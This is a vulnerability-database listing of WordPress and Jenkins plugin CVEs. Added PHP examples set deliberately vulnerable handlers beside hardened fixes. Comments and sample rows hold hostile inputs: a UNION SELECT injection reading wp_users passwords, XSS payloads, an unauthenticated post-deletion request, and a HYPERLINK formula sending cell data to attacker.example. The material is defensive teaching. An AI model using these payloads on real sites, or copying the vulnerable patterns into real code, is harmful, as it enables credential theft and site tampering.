Lucene search

119 matches found

RedhatCVE
added 2025/05/23 9:27 a.m.

CVE-2024-12395

The WooCommerce Additional Fees On Checkout Free plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘number’ parameter in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated...

CVSS 6.1 | AI score 6.4 | EPSS 0.00455
Exploits 0 | References 1
RedhatCVE
added 2025/05/23 9:27 a.m.

CVE-2024-12566

The Email Subscribers by Icegram Express WordPress plugin before 5.7.45 does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed, for example in...

CVSS 4.8 | AI score 5.7 | EPSS 0.00292
Exploits 1 | References 1
RedhatCVE
added 2025/05/23 7:55 a.m.

CVE-2024-4000

The WordPress Header Builder Plugin – Pearl plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stmhb' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possib...

CVSS 6.4 | AI score 5.8 | EPSS 0.00493
Exploits 0 | References 1
RedhatCVE
added 2025/05/23 6:44 a.m.

CVE-2024-10175

The Pricing Tables For WPBakery Page Builder formerly Visual Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wdopricingtables shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied...

CVSS 6.4 | AI score 5.8 | EPSS 0.00255
Exploits 0 | References 1
RedhatCVE
added 2025/05/23 3:43 a.m.

CVE-2023-30521

A missing permission check in Jenkins Assembla merge request builder Plugin 1.1.13 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository...

CVSS 5.3 | AI score 6.8 | EPSS 0.00518
Exploits 0 | References 1
RedhatCVE
added 2025/05/23 2:50 a.m.

CVE-2023-0068

The Product GTIN EAN, UPC, ISBN for WooCommerce WordPress plugin through 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored...

CVSS 5.4 | AI score 5.9 | EPSS 0.00471
Exploits 2 | References 1
RedhatCVE
added 2025/05/23 1:48 a.m.

CVE-2023-2744

The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the type parameter in the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin...

CVSS 7.2 | AI score 7.3 | EPSS 0.0261
Exploits 5 | References 1
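The REST endpoint case in CVE-2023-2744, a type parameter concatenated into a SQL statement, looks like the first handler below; the second shows the fix. This is an added example, not WP ERP's code. It assumes a WordPress runtime with the REST API and $wpdb loaded; the route example/v1/people, the example_people table and its columns, and the allowed type values are invented for illustration.

```php
<?php
// Added example, not WP ERP's code. Assumes WordPress (REST API + $wpdb) is loaded;
// the route, table, columns and the allowed 'type' values below are made up.

// Vulnerable pattern: the request parameter is interpolated straight into the query.
// A value such as  x' UNION SELECT user_login, user_pass FROM wp_users -- 
// closes the string literal and changes the statement.
function example_people_vulnerable( WP_REST_Request $request ) {
    global $wpdb;
    $type = $request->get_param( 'type' );
    $sql  = "SELECT id, first_name FROM {$wpdb->prefix}example_people WHERE type = '{$type}'";
    return rest_ensure_response( $wpdb->get_results( $sql ) );
}

// Hardened: an allow-list for the parameter plus $wpdb->prepare() to bind the value.
const EXAMPLE_PEOPLE_TYPES = array( 'customer', 'vendor', 'employee' );

function example_people_hardened( WP_REST_Request $request ) {
    global $wpdb;
    $type = $request->get_param( 'type' );
    // Defence in depth: the route schema below already rejects other values.
    if ( ! in_array( $type, EXAMPLE_PEOPLE_TYPES, true ) ) {
        return new WP_Error( 'rest_invalid_param', 'Unknown people type', array( 'status' => 400 ) );
    }
    $sql = $wpdb->prepare(
        "SELECT id, first_name FROM {$wpdb->prefix}example_people WHERE type = %s",
        $type
    );
    return rest_ensure_response( $wpdb->get_results( $sql ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/people', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_people_hardened',
        // Require a capability instead of the '__return_true' many plugins ship.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args'                => array(
            'type' => array(
                'required'          => true,
                'type'              => 'string',
                'enum'              => EXAMPLE_PEOPLE_TYPES, // validated before the callback runs
                'sanitize_callback' => 'sanitize_key',
            ),
        ),
    ) );
} );
```

$wpdb->prepare() binds the value so a quote inside it cannot terminate the string literal, and the enum in the route's args schema rejects anything outside the allow-list before the callback is reached. prepare() only binds values, not identifiers: a parameter that selects a column or table name still needs the allow-list. The permission_callback is worth having even though this entry's issue was exploitable by admins; the same query reachable by lower roles or anonymous users would be a far worse finding.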
RedhatCVE
added 2025/05/22 11:32 p.m.

CVE-2022-1904

The Pricing Tables WordPress Plugin WordPress plugin before 3.2.1 does not sanitise and escape a parameter before outputting it back in a page available to any user, both authenticated and unauthenticated, when a specific setting is enabled, leading to a Reflected Cross-Site Scripting...

CVSS 6.1 | AI score 6.3 | EPSS 0.01242
Exploits 2 | References 1
RedhatCVE
added 2025/05/22 11:04 p.m.

CVE-2022-34208

A missing permission check in Jenkins Beaker builder Plugin 1.10 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL...

CVSS 4.3 | AI score 6.5 | EPSS 0.00509
Exploits 0 | References 1
RedhatCVE
added 2025/05/22 10:59 p.m.

CVE-2022-34186

Jenkins Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape the name and description of Moded Extended Choice parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission...

CVSS 5.4 | AI score 5.4 | EPSS 0.00693
Exploits 0 | References 1
RedhatCVE
added 2025/05/22 9:54 p.m.

CVE-2022-2276

The WP Edit Menu WordPress plugin before 1.5.0 does not have authorisation and CSRF checks in an AJAX action, which could allow unauthenticated attackers to delete arbitrary posts/pages from the blog...

CVSS 4.3 | AI score 7.1 | EPSS 0.00323
Exploits 2 | References 1
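An admin-ajax.php handler that is hooked for anonymous users and performs neither a nonce nor a capability check is the pattern behind CVE-2022-2276. Below is an added example, not WP Edit Menu's code; it assumes a WordPress runtime, and the action name example_delete_item, the nonce action, the post_id field and the script handle are invented.

```php
<?php
// Added example, not WP Edit Menu's code. Assumes WordPress is loaded; the action,
// nonce and field names are made up for illustration.

// Vulnerable pattern: no nonce (CSRF), no capability check (authorisation), and
// registered on the nopriv hook, so any visitor can POST
//   action=example_delete_item&post_id=1   to /wp-admin/admin-ajax.php
function example_delete_item_vulnerable() {
    $post_id = isset( $_POST['post_id'] ) ? (int) $_POST['post_id'] : 0;
    wp_delete_post( $post_id, true );
    wp_die();
}
// How the vulnerable handler would have been hooked (left unhooked here on purpose):
// add_action( 'wp_ajax_example_delete_item',        'example_delete_item_vulnerable' );
// add_action( 'wp_ajax_nopriv_example_delete_item', 'example_delete_item_vulnerable' );

// Hardened: logged-in only, a nonce bound to this action, and a per-object capability check.
function example_delete_item_hardened() {
    // Dies with HTTP 403 if the 'nonce' field is missing or not valid for this user+action.
    check_ajax_referer( 'example_delete_item', 'nonce' );

    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    // Authorisation is evaluated per post: an Author may delete their own draft, not page 2.
    if ( ! $post_id || ! current_user_can( 'delete_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }
    if ( ! wp_delete_post( $post_id, true ) ) {
        wp_send_json_error( array( 'message' => 'Delete failed' ), 500 );
    }
    wp_send_json_success( array( 'deleted' => $post_id ) );
}
add_action( 'wp_ajax_example_delete_item', 'example_delete_item_hardened' );
// No wp_ajax_nopriv_ registration: the action does not exist for anonymous requests.

// The nonce is issued server-side and handed to the page's script; it must never be
// something the client can compute on its own.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'example-delete', plugins_url( 'delete.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-delete', 'exampleDelete', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_delete_item' ),
    ) );
} );
```

check_ajax_referer() ties the request to a nonce issued for this user and this action, which defeats cross-site requests but says nothing about whether the user may delete that post; current_user_can( 'delete_post', $post_id ) is the authorisation check and is evaluated per object. Dropping the wp_ajax_nopriv_ hook removes the unauthenticated path altogether. A nonce on its own is not an authorisation mechanism and a capability check on its own does not stop CSRF; the fix for this class of bug needs both.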
RedhatCVE
added 2025/05/22 7:21 p.m.

CVE-2021-24309

The "Schedule Name" input in the general options of the Weekly Schedule WordPress plugin before 3.4.3 did not properly sanitize input, allowing a user to inject JavaScript code using the...

CVSS 5.4 | AI score 6.8 | EPSS 0.0065
Exploits 2 | References 1
RedhatCVE
added 2025/05/22 6:24 p.m.

CVE-2021-24498

The Calendar Event Multi View WordPress plugin before 1.4.01 does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page via php/edit.php, leading to a reflected Cross-Site Scripting issue...

CVSS 6.1 | AI score 6.2 | EPSS 0.03065
Exploits 2 | References 1
RedhatCVE
added 2025/05/22 4:39 p.m.

CVE-2020-36503

The Connections Business Directory WordPress plugin before 9.7 does not validate or sanitise some connections' fields, which could lead to a CSV injection issue...

CVSS 8 | AI score 7 | EPSS 0.01207
Exploits 1
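CSV injection, the class of issue in CVE-2020-36503, arises when a field a user controls is exported to CSV and the spreadsheet that opens it treats a cell beginning with =, +, -, @ (or a tab or carriage return) as a formula. The following is an added example in plain PHP, not Connections Business Directory's code; it runs without WordPress, and the directory rows are constructed for illustration.

```php
<?php
// Added example, not the plugin's code. Plain PHP, no WordPress needed; sample rows are constructed.

/**
 * Neutralise a cell that a spreadsheet would otherwise evaluate as a formula.
 * Cells starting with =, +, -, @, tab or carriage return get a leading single
 * quote, which Excel and LibreOffice Calc take as "treat this cell as text".
 */
function example_csv_neutralize( string $cell ): string {
    if ( $cell !== '' && strpos( "=+-@\t\r", $cell[0] ) !== false ) {
        return "'" . $cell;
    }
    return $cell;
}

/** Emit one row RFC 4180 style: every field quoted, embedded quotes doubled. */
function example_csv_row( array $fields ): string {
    $quoted = array();
    foreach ( $fields as $field ) {
        $field    = example_csv_neutralize( (string) $field );
        $quoted[] = '"' . str_replace( '"', '""', $field ) . '"';
    }
    return implode( ',', $quoted ) . "\r\n";
}

/** Build a complete CSV document (header + rows) as a string. */
function example_csv_export( array $header, array $rows ): string {
    $out = example_csv_row( $header );
    foreach ( $rows as $row ) {
        $out .= example_csv_row( $row );
    }
    return $out;
}

// Constructed sample: the second entry's "name" is an attacker-supplied formula that,
// if left as-is, would open an attacker URL carrying cell A1's contents when clicked.
$rows = array(
    array( 'Acme Ltd', 'hello@acme.example', '+1 555 0100' ),
    array( '=HYPERLINK("http://attacker.example/?"&A1,"Click me")', 'x@attacker.example', '@SUM(1+1)' ),
);
echo example_csv_export( array( 'name', 'email', 'phone' ), $rows );
// Second data row becomes:
// "'=HYPERLINK(""http://attacker.example/?""&A1,""Click me"")","x@attacker.example","'@SUM(1+1)"
```

The trade-off is that legitimate values such as a phone number starting with + are prefixed too, and some viewers show the apostrophe literally. Validating the fields at input time, which is what this entry's wording ("does not validate or sanitise some connections' fields") points at, limits what gets stored, but neutralising at export time is what protects whoever opens the file, so exporters should do it regardless of what the input path checks.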
RedhatCVE
added 2025/05/22 8:16 a.m.

CVE-2019-16566

A missing permission check in Jenkins Team Concert Plugin 1.3.0 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins...

CVSS 6.5 | AI score 6.5 | EPSS 0.00798
Exploits 0 | References 1
CVE
added 2025/05/15 8:07 p.m.

CVE-2025-1303

CVE-2025-1303 concerns the Plugin Oficial WordPress plugin (Getnet para WooCommerce) up to version 1.7.3. The issue is a reflected cross-site scripting (XSS) vulnerability caused by a parameter not being sanitised/escaped before being echoed in the page. Exploitation is described against unauthen...

CVSS 6.1 | AI score 6.3 | EPSS 0.00525
Exploits 1 | References 1 | Affected Software 1
Vulnrichment
added 2025/05/15 8:06 p.m.

CVE-2024-13053 Form Maker by 10Web < 1.15.33 - Admin+ Stored XSS via Theme Title

The Form Maker by 10Web WordPress plugin before 1.15.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed, for example in a multisite setup...

AI score 4.7 | EPSS 0.00266
Exploits 1 | References 1
CVE
added 2025/05/15 8:06 p.m.

CVE-2024-12679

CVE-2024-12679 affects the Prisna GWT WordPress plugin and is due to inadequate sanitisation/escaping of certain settings in versions before 1.4.14. This can enable admin-level Stored XSS even when unfiltered_html is disallowed (e.g., in multisite). The impact is stored XSS with potential privil...

CVSS 4.8 | AI score 5.7 | EPSS 0.00266
Exploits 1 | References 1 | Affected Software 1
Vulnrichment
added 2025/05/15 8:06 p.m.

CVE-2024-10076 Jetpack < 13.8, Boost < 3.4.8 - Contributor+ Stored XSS

The Jetpack WordPress plugin before 13.8 and the Jetpack Boost WordPress plugin before 3.4.8 use regexes in the Site Accelerator features when switching image URLs to their CDN counterpart. Unfortunately, some of them may match patterns they shouldn't, ultimately making it possible for contributor and abo...

AI score 5.9 | EPSS 0.00274
Exploits 0 | References 1
CVE
added 2025/05/02 6:41 a.m.

CVE-2024-13858

The CVE-2024-13858 entry concerns the BuddyBoss Platform plugin for WordPress and the BuddyBoss Theme, both affected by Stored Cross-Site Scripting via the invitee_name parameter. Affected versions are all up to 2.8.50 (platform) and 2.8.41 (theme), with insufficient input sanitization and output escapi...

CVSS 6.4 | AI score 5.5 | EPSS 0.00226
Exploits 0 | References 4 | Affected Software 1
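The shortcode entries in this list (CVE-2024-4000, CVE-2024-10175, CVE-2023-0068) and the reflected ones (CVE-2024-12395, CVE-2022-1904, CVE-2021-24498, CVE-2025-1303) share one defect: user-controlled text written into HTML without escaping for the context it lands in. The following is an added example, not code from any plugin on this page. It assumes a WordPress runtime; the shortcode name example_table, its attributes and the number query parameter are invented for illustration.

```php
<?php
// Added example, not any listed plugin's code. Assumes WordPress is loaded; the
// shortcode name, attributes and query parameter are made up.

// Vulnerable shortcode handler: attributes are concatenated into markup unescaped.
// A Contributor can publish
//   [example_table title='x" onmouseover="alert(1)' link='javascript:alert(1)']
// and the payload is stored and served to every reader of the post.
function example_table_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'title' => '', 'link' => '', 'rows' => 3 ), $atts, 'example_table' );
    return '<a class="tbl" href="' . $atts['link'] . '" title="' . $atts['title'] . '">'
         . $atts['title'] . '</a> (' . $atts['rows'] . ' rows)';
}

// Hardened: each value is escaped for the exact context it is placed in.
function example_table_hardened( $atts ) {
    $atts = shortcode_atts( array( 'title' => '', 'link' => '', 'rows' => 3 ), $atts, 'example_table' );
    $rows = absint( $atts['rows'] );          // numeric attribute: cast, never echo raw
    return sprintf(
        '<a class="tbl" href="%s" title="%s">%s</a> (%d rows)',
        esc_url( $atts['link'] ),             // href: drops javascript: and other disallowed schemes
        esc_attr( $atts['title'] ),           // attribute value context
        esc_html( $atts['title'] ),           // text node context
        $rows
    );
}
add_shortcode( 'example_table', 'example_table_hardened' );

// Vulnerable reflected case: a request parameter echoed back to any visitor.
//   /?number=" autofocus onfocus="alert(document.domain)
function example_reflect_vulnerable() {
    echo '<input name="number" value="' . $_GET['number'] . '">';
}

// Hardened: sanitise on the way in, escape on the way out. The sanitiser alone is not
// enough, because sanitize_text_field() strips tags but leaves quotes in place.
function example_reflect_hardened() {
    $number = isset( $_GET['number'] ) ? sanitize_text_field( wp_unslash( $_GET['number'] ) ) : '';
    echo '<input name="number" value="' . esc_attr( $number ) . '">';
}
```

Sanitising input (sanitize_text_field, absint) bounds what gets stored; escaping output (esc_attr, esc_html, esc_url) is what actually prevents the injection and has to match the destination context, since a value safe inside a text node can still break out of an attribute. The settings entries above (CVE-2024-12566, CVE-2024-13053, CVE-2024-12679) are the same fix applied to plugin options: disallowing unfiltered_html governs what core filters, so a plugin's own settings still need the plugin's own sanitisation on save and escaping on display.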